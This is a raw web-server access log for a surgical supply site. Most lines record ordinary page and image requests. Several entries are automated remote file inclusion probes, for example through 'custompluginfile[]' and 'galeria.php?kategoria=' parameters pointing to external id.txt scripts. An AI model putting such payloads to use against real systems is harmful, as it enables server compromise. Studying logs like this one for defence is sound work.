201.171.82.222 - - [17/May/2009:03:40:35 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:37 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:37 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:38 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:38 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:38 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:38 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:40 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:40 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:40 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:40 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:40 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:40 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:40 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:40 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:40 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:41 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:41 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:42 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:44 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG HTTP/1.1" 200 69479 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:46 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:46 -0400] "GET /images/items/ALLOOSS2_THUMB.JPG HTTP/1.1" 200 2001 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:46 -0400] "GET /images/items/ALLOOSS1_THUMB.JPG HTTP/1.1" 200 30054 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:46 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:46 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:52 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:52 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:52 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:54 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:40:54 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:41:03 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:41:04 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:41:04 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:41:04 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:41:06 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:41:06 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
62.44.79.35 - - [17/May/2009:03:41:38 -0400] "GET /logs/access_log.Q108082200%20%20////////?custompluginfile%5B%5D=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.44.79.35 - - [17/May/2009:03:41:58 -0400] "GET /logs/access_log.Q108082200%20%20///?custompluginfile%5B%5D=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:03:42:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.36.62.70 - - [17/May/2009:03:42:30 -0400] "GET /logs/access_log.Q108121900//galeria.php?start=0&kategoria=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.826"
216.36.62.70 - - [17/May/2009:03:42:30 -0400] "GET //galeria.php?start=0&kategoria=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.826"
216.36.62.70 - - [17/May/2009:03:42:30 -0400] "GET /logs//galeria.php?start=0&kategoria=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.826"
216.36.62.70 - - [17/May/2009:03:42:31 -0400] "GET /logs/access_log.Q108120600//galeria.php?start=0&kategoria=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.826"
201.171.82.222 - - [17/May/2009:03:42:36 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:42:36 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:42:45 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:42:45 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:43:19 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:43:19 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
72.30.79.49 - - [17/May/2009:03:43:57 -0400] "GET /logs/error_log.Q107101800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
201.171.82.222 - - [17/May/2009:03:44:01 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:44:01 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:44:08 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:44:08 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:44:22 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:44:23 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
193.25.112.198 - - [17/May/2009:03:44:24 -0400] "GET ////////?custompluginfile%5B%5D=http://www.votaya.com//pics/site/image?? HTTP/1.1" 200 458 "-" "libwww-perl/5.810"
201.171.82.222 - - [17/May/2009:03:44:24 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:44:24 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:44:27 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:44:27 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
193.25.112.198 - - [17/May/2009:03:44:28 -0400] "GET ///?custompluginfile%5B%5D=http://www.votaya.com//pics/site/image?? HTTP/1.1" 200 453 "-" "libwww-perl/5.810"
201.171.82.222 - - [17/May/2009:03:44:31 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:44:32 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:44:32 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:44:32 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:44:34 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:44:34 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
